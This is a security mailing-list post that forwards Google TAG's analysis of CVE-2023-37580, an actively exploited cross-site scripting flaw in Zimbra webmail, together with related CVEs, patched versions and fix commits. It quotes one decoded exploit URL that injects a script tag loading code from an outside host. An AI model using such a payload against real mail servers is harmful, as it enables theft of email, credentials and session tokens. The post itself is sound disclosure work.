Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 17 Nov 2023 14:11:59 +0200
From: Valtteri Vuorikoski <>
Subject: CVE-2023-37580 (and others): XSS vulnerabilities in Zimbra
 Collaboration Suite

Not associated with Zimbra/TAG, just forwarding this.

The Zimbra Collaboration Suite is a groupware suite that includes a
webmail client. While the current main offering is a paid product, an
open-source version is available on Zimbra's Github.

There appear to be multiple recent vulnerabilities in the suite that
allow Javascript code to be injected into pages running in
authenticated contexts that affect the 8.8.x, 9.0.x and/or 10.0.x
release trains.

Google TAG has published an analysis of CVE-2023-37580 at

  [T]here was a vulnerability in Zimbra that injected the parameter
  within the URL directly into the webpage, causing the script to
  be executed. An example that could trigger the XSS is:


  which decodes to:

    https://mail.REDACTED[.]com/m/momoveto?st=acg"/><script src="https://REDACTED/script.js"></script>//

  The fix was to escape the contents of the st parameter before it was
  set as the value in an html object.

According to TAG, the vulnerability is being actively exploited to
"steal email data, user credentials, and authentication tokens". It
appears that at least some of the same threat actors that were using
the recent Roundcube webmail exploit (CVE-2023-5631) to target
European government users have also been exploiting this vulnerability
against similar targets. However, unlike the Roundcube vulnerability,
CVE-2023-37580 is not "zero-click" in the sense that simply opening an
e-mail message is enough to trigger the exploit.

Independent of the TAG report, the Zimbra security advisory page
<> lists at
least three other recent XSS vulnerabilities that based on the brief
description and recent Github commits may provide alternative
avenues for similar exploits: CVE-2023-43102, CVE-2023-41106 and

As Zimbra no longer provides packaged versions of the suite's
open-source version, users must manually update their installations
from the upstream repository or rely on third-party-provided
packages/container images. Based on the advisory page, the tagged
releases 8.8.15p44, 9.0.0p37 and 10.0.5 should include patches for all
of the above.

The official "advisories" are quite uninformative, but the
following commits appear related to the above CVEs:


File removal commit
may be related to one (or more) of the other CVEs.


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.